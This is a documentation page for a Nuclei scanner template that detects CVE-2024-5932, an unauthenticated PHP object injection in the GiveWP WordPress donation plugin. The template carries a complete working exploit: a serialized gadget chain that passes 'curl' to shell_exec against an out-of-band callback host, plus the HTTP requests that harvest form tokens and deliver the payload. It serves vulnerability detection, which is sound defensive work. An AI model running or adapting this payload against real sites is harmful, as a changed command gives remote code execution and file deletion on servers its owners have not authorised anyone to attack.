GiveWP - PHP Object Injection
ID: CVE-2024-5932
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,rce,wp,wp-plugin,wordpress,oast,givewp
Description
Section titled “Description”The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the ‘give_title’ parameter.
YAML Source
Section titled “YAML Source”id: CVE-2024-5932
info: name: GiveWP - PHP Object Injection author: iamnoooob,rootxharsh,pdresearch severity: critical description: | The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. impact: | This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files. remediation: Fixed in 3.14.2. reference: - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/includes/login-register.php#L235 - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/includes/process-donation.php#L420 - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/src/DonorDashboards/Tabs/EditProfileTab/AvatarRoute.php#L51 - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/vendor/tecnickcom/tcpdf/tcpdf.php#L7861 - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/vendor/vendor-prefixed/fakerphp/faker/src/Faker/ValidGenerator.php#L80 - https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932/ - https://thehackernews.com/2024/08/givewp-wordpress-plugin-vulnerability.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-5932 cwe-id: CWE-502 epss-score: 0.00178 epss-percentile: 0.55631 cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: givewp product: givewp framework: wordpress publicwww-query: "/wp-content/plugins/give/" tags: cve,cve2024,rce,wp,wp-plugin,wordpress,oast,givewp
flow: http(1) && http(2) && http(3)
variables: oast: "{{interactsh-url}}" len_payload: "{{ len(oast) + 5 }}" payload: 'O:19:"Stripe\\\\StripeObject":1:{s:7:"_values";a:1:{i:0;O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:9:"container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:9:"generator";O:24:"Give\\\\Container\\\\Container":1:{s:9:"instances";a:1:{s:8:"address1";s:{{len_payload}}:"curl {{oast}}";}}s:10:"maxRetries";i:1;s:9:"validator";s:10:"shell_exec";}}}}}}' email: "{{to_lower(rand_text_alpha(8))}}@gmail.com" firstname: "{{to_lower(rand_text_alpha(5))}}" lastname: "{{to_lower(rand_text_alpha(5))}}"
http: - raw: - | GET /wp-json/wp/v2/give_forms/ HTTP/1.1 Host: {{Hostname}}
matchers: - type: word part: body words: - '"type":' - '"guid":' condition: and internal: true
extractors: - type: json part: body name: value internal: true json: - '.[0].slug'
- type: json part: body name: give-form-title internal: true json: - '.[0].title.rendered'
- type: json part: body name: links internal: true json: - '.[0].link' - raw: - | GET /give/{{value}}?giveDonationFormInIframe=1 HTTP/1.1 Host: {{Hostname}}
matchers: - type: word part: body words: - 'give-form-hash' - 'give-form-id-prefix' condition: and internal: true
extractors: - type: regex part: body group: 1 name: give-form-hash internal: true regex: - 'name="give\-form\-hash" value="([0-9a-z]+)"'
- type: regex part: body group: 1 name: give-form-id-prefix internal: true regex: - 'name="give\-form\-id\-prefix" value="([0-9-]+)"'
- type: regex part: body group: 1 name: give-form-id internal: true regex: - 'name="give\-form\-id" value="([0-9]+)"'
- type: regex part: body group: 1 name: give-amount internal: true regex: - 'give\-form\-minimum"\n\s+value="([0-9.]+)"\/>'
- raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8
give-honeypot=&give-form-id-prefix={{give-form-id-prefix}}&give-form-id={{give-form-id}}&give-form-title={{give-form-title}}&give-current-url={{links}}&give-form-url={{RootURL}}&give-form-minimum={{give-amount}}&give-form-maximum=1000000&give-form-hash={{give-form-hash}}&give-price-id=custom&give-amount={{give-amount}}&give_first={{firstname}}&give_last={{lastname}}&give_email={{email}}&give_stripe_payment_method=&give-user-id=1&give_action=purchase&give-gateway=manual&give_embed_form=1&action=give_process_donation&&give_title={{payload}}
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: word part: body words: - '"error_data"' - '"unknown_error"' condition: and# digest: 4b0a00483046022100e7b666d26ce14bf6705b40916bb9bc752a96d887826d9a5b5bcdd51b384e80b1022100aacfdde145470ef1ee0ab33225cc5eff0f4138a22aafd405c69facf4226ce17c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-5932.yaml"